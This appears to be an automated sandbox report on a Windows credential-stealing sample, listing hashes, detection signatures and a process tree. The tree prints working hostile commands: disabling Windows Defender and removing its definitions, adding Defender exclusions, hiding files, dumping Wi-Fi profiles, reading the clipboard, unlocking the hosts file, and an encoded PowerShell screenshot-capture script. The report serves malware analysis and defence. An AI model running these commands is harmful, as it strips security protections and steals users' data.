Edit tour

Windows Analysis Report
mcgen.exe

Overview

General Information

Sample name:	mcgen.exe
Analysis ID:	1583242
MD5:	211da2d6a5b8b04b49d1c837eecee46c
SHA1:	4abdbb0e47fc77ec67348f73e47e526dbdd1dc1f
SHA256:	17e89140548fc71f7670ea5ee7df6feab0101386b8d087a81056ac6812d77a51
Tags:	exeQuasarRATuser-lontze7
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Ping/Del Command Combination

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses the Telegram API (likely for C&C communication)

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

mcgen.exe (PID: 3212 cmdline: "C:\Users\user\Desktop\mcgen.exe" MD5: 211DA2D6A5B8B04B49D1C837EECEE46C)

mcgen.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\mcgen.exe" MD5: 211DA2D6A5B8B04B49D1C837EECEE46C)

cmd.exe (PID: 6104 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4460 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3196 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4072 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 7224 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 1444 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2300 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4600 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 3384 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3524 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6540 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2788 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6260 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 3416 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7108 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1924 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 1088 cmdline: attrib +h +s "C:\Users\user\Desktop\mcgen.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 5200 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7036 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3416 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5440 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3552 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 2912 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7448 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6104 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7556 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6312 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7508 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5608 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7324 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 3660 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7464 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 7456 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7472 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7524 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7956 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7724 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 7820 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8044 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

